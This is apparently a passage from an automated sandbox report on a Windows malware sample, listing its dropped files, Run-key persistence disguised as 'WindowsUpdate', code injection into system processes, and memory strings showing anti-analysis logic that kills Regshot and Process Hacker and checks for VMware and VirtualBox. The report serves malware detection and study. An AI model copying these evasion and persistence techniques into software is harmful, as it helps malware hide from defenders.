              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041D485 push eax; ret 15_2_0041D4D8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041D53C push eax; ret 15_2_0041D542

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | File created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe.exe
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | File created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | File created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate

              Hooking and other Techniques for Hiding and Protection

              Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE3
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005C25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_005C25A0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0054FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_0054FC8A
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match | File source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7AD324
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7B0774
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7AD944
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7AD504
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7AD544
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7AD1E4
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7B0154
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7AD8A4
              Source: C:\Windows\SysWOW64\ipconfig.exe | API/Special instruction interceptor: Address: 7FFBCB7ADA44
              Source: oxhvi.msc, 00000008.00000003.1658007635.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656361973.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657013245.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658351726.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656039617.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660309685.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656222821.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENC
              Source: oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938810056.000000000197E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938611568.0000000001976000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
              Source: oxhvi.msc, 00000008.00000003.1658007635.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656361973.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657013245.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658351726.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656039617.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656222821.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807513564.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660500046.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXEC
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000007EBA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660500046.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE&
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000007EBA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
              Source: oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXEBY
              Source: oxhvi.msc, 00000008.00000002.1660289519.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658007635.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656361973.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657013245.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656039617.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658603791.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1659027225.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656222821.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")M
              Source: oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807513564.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809229436.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809063445.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1810786796.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940414154.00000000018E3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
              Source: oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807513564.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809229436.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809063445.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1810786796.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENOCA+
              Source: oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1941308878.00000000018D4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940816388.00000000018D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660500046.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXES
              Source: oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXE
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000007EBA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 809904 second address: 80990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 809B7E second address: 809B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: C79904 second address: C7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: C79B7E second address: C79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: FC9904 second address: FC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 959904 second address: 95990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: FC9B7E second address: FC9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 959B7E second address: 959B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 29D9904 second address: 29D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 519904 second address: 51990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 519B7E second address: 519B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 29D9B7E second address: 29D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 2E19904 second address: 2E1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 2E19B7E second address: 2E19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_00409AB0 rdtsc 15_2_00409AB0
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8486
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1453
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 746
              Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 4767
              Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 5204
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscAPI coverage: 5.4 %
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeAPI coverage: 1.7 %
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeAPI coverage: 1.2 %
              Source: C:\Windows\explorer.exe TID: 1148Thread sleep time: -16972000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 1148Thread sleep time: -2906000s >= -30000s
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep count: 4767 > 30
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep time: -9534000s >= -30000s
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep count: 5204 > 30
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep time: -10408000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe TID: 3428Thread sleep count: 49 > 30
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe TID: 3428Thread sleep count: 178 > 30
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe TID: 3428Thread sleep count: 108 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A2F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A2F826
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A41630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00A41630
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A51FF8 FindFirstFileExA,0_2_00A51FF8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_0059E387
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0059D836
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0059DB69
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_005A9F9F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_005AA0FA
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_005AA488
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_005A65F1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0056C642 FindFirstFileExW,8_2_0056C642
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A7248 FindFirstFileW,FindClose,8_2_005A7248
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_005A72E9
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A44E14 VirtualQuery,GetSystemInfo,0_2_00A44E14
              Source: oxhvi.msc.exe, 00000016.00000003.1808791930.0000000000CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe~_
              Source: oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
              Source: oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
              Source: explorer.exe, 00000011.00000002.2639211861.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
              Source: oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenA
              Source: oxhvi.msc.exe, 00000016.00000003.1807788495.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C7
              Source: oxhvi.msc, 00000008.00000003.1656675919.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
              Source: oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
              Source: explorer.exe, 00000011.00000000.1639216371.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then0
              Source: oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenT
              Source: explorer.exe, 00000011.00000002.2639211861.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000011.00000000.1639216371.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: explorer.exe, 00000011.00000000.1639216371.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
              Source: oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
              Source: oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
              Source: oxhvi.msc.exe, 0000001B.00000003.1940271086.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then+
